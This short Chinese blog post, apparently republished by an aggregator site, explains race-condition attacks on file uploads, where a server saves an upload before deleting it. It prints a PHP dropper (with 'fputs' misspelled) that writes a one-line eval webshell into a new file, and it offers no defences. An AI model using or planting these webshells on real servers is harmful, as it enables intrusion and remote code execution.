竞争条件攻击
Posted echodetected
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了竞争条件攻击相关的知识,希望对你有一定的参考价值。
竞争条件攻击属于文件上传漏洞的一种。
一些网站上传文件的逻辑是先允许上传文件,再检测文件中是否包含webshell的脚本,如果存在则删除webshell文件。
但是攻击者可以利用上传文件和删除文件的时间差来完成文件上传漏洞攻击。
攻击者可以上传类似代码hacker.php:
<?php
foputs(fopen(‘../shell.php‘,‘w‘),‘<?php @eval($_POST[a]) ?>‘);
?>
访问文件时,文件代码会执行,在hacker.php文件所在目录下新建一个shell.php,内容即:
<?php @eval($_POST[a]) ?>
旧的webshell文件本来就只是一个垫脚石的存在,删不删除无所谓,我们利用新建的webshell文件可以进行漏洞攻击
竞争条件攻击只试用于绕过后端的检测,对于绕过前端代码检测方法是没有用的。
如果攻击者能讲两者很好得结合起来,说不定会有成效。
以上是关于竞争条件攻击的主要内容,如果未能解决你的问题,请参考以下文章
Swift新async/await并发中利用Task防止指定代码片段执行的数据竞争(Data Race)问题